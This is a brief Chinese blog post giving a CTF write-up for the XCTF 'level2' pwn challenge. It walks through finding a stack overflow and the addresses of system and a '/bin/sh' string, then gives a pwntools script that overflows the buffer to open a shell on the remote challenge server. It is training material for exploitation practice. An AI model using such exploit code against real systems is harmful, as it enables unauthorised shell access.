level2攻防世界pwn

checksec后試運(yùn)行


放入64位ida



典型棧溢出

發(fā)現(xiàn)system,但參數(shù)不對(duì),那我們shift+F12查看字符串,發(fā)現(xiàn)binsh,地址為0x0804A024


system在plt的地址為0x08048320

寫腳本

#coding=utf8
from pwn import *
context.log_level = 'debug'
p = remote('111.198.29.45',31028)

system_plt = 0x08048320
binsh = 0x0804A024

payload = ''
payload += 'A'*0x88
payload += p32(0)
payload += p32(system_plt)
payload += p32(0)
payload += p32(binsh)

p.sendline(payload)
p.interactive()
成功
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • 官網(wǎng) 中文版本 好的網(wǎng)站 Content-type: text/htmlBASH Section: User ...
    不排版閱讀 4,707評(píng)論 0 5
  • 一、Python簡(jiǎn)介和環(huán)境搭建以及pip的安裝 4課時(shí)實(shí)驗(yàn)課主要內(nèi)容 【Python簡(jiǎn)介】: Python 是一個(gè)...
    _小老虎_閱讀 6,319評(píng)論 0 10
  • 一個(gè)月的約定快要到了,瘋狂補(bǔ)棧溢出知識(shí),偷看大佬們博客,希望學(xué)到點(diǎn)什么。 棧溢出學(xué)習(xí)網(wǎng)站 CTF Wiki 棧溢出...
    杰_74閱讀 579評(píng)論 0 1
  • 0x01 Start checksec 的時(shí)候可以看到程序沒有打開任何的安全保護(hù)措施,然后查看IDA下的匯編代碼,...
    Nevv閱讀 1,755評(píng)論 0 2
  • 一直很想有個(gè)地方能寫自己認(rèn)為有用,對(duì)別的開發(fā)者也能有益,便捷的文章. 感覺簡(jiǎn)書的頁面比較簡(jiǎn)潔,希望以后能堅(jiān)持寫B(tài)log.
    付寒宇閱讀 162評(píng)論 0 0

友情鏈接更多精彩內(nèi)容